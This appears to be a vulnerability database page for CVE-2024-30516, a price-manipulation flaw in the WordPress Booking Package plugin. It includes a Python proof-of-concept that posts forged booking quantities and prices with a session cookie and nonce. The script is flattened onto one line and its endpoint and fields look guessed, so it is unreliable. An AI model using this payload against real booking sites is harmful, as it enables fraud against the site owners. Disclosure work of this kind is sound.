Security Vulnerability Report
中文
CVE-2024-30516 CVSS 7.5 HIGH

CVE-2024-30516

Published: 2026-01-05 17:15:44
Last Modified: 2026-04-15 00:35:42

Description

Improper Validation of Specified Quantity in Input vulnerability in SaasProject Booking Package allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Booking Package: from n/a through 1.6.27.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Booking Package < 1.6.28

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2024-30516 PoC - Booking Package Price Manipulation # Target: WordPress site with Booking Package plugin < 1.6.28 target_url = "http://target-wordpress-site.com" # Step 1: Get nonce for authenticated requests # (Attacker needs to register as a basic subscriber) # Step 2: Manipulate booking quantity/price via API def exploit_price_manipulation(target_url, session_cookie, nonce): """ Exploit improper quantity validation in Booking Package Allows unauthorized modification of booking prices """ api_endpoint = f"{target_url}/wp-json/booking-package/v1/booking" # Malicious payload with manipulated quantity payload = { "course": "1", "guests": "999999", # Manipulated quantity - no proper validation "price": "0.01", # Manipulated price "currency": "USD", "nonce": nonce, "action": "editBooking" } headers = { "Content-Type": "application/json", "Cookie": session_cookie, "X-WP-Nonce": nonce } try: response = requests.post(api_endpoint, json=payload, headers=headers) if response.status_code == 200: result = response.json() print(f"[+] Exploit successful: {result}") return True else: print(f"[-] Exploit failed: {response.status_code}") return False except Exception as e: print(f"[-] Error: {e}") return False # Usage example # session = "wordpress_logged_in_xxx..." # nonce = "user_nonce_value" # exploit_price_manipulation(target_url, session, nonce)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-30516", "sourceIdentifier": "[email protected]", "published": "2026-01-05T17:15:44.430", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Validation of Specified Quantity in Input vulnerability in SaasProject Booking Package allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Booking Package: from n/a through 1.6.27."}, {"lang": "es", "value": "Vulnerabilidad de Validación Incorrecta de Cantidad Especificada en la Entrada en SaasProject Booking Package permite Acceder a Funcionalidad No Restringida Adecuadamente por ACLs. Este problema afecta a Booking Package: desde n/a hasta 1.6.27."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1284"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/booking-package/vulnerability/wordpress-booking-package-plugin-1-6-27-price-manipulation-vulnerability?_s_id=cve", "source": "[email protected]"}]}}